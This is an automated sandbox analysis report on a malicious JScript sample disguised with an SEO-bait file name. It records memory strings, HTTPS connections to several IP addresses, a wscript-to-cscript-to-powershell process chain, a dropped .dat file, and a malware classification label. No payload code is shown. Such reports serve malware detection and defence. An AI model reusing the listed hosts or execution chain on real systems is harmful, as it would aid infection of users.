Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://jsperf.com/try-catch-performance-overhead
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://momentjs.com/
Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 109.237.132.6:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.67.130:443 -> 192.168.2.5:49717 version: TLS 1.2

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Abnormal high CPU Usage
Source: C:\Windows\System32\wscript.exe Process Stats: CPU usage > 49%
Java / VBScript file with very long strings (likely obfuscated code)
Source: is it legal to kill a peacock in california 93889.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal72.troj.expl.evad.winJS@13/9@3/3
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Insurance Negotiations.dat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxxrwmnz.m5k.ps1 Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\is it legal to kill a peacock in california 93889.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE BALANC~1.JS
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE BALANC~1.JS
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS" Jump to behavior
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "BALANC~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
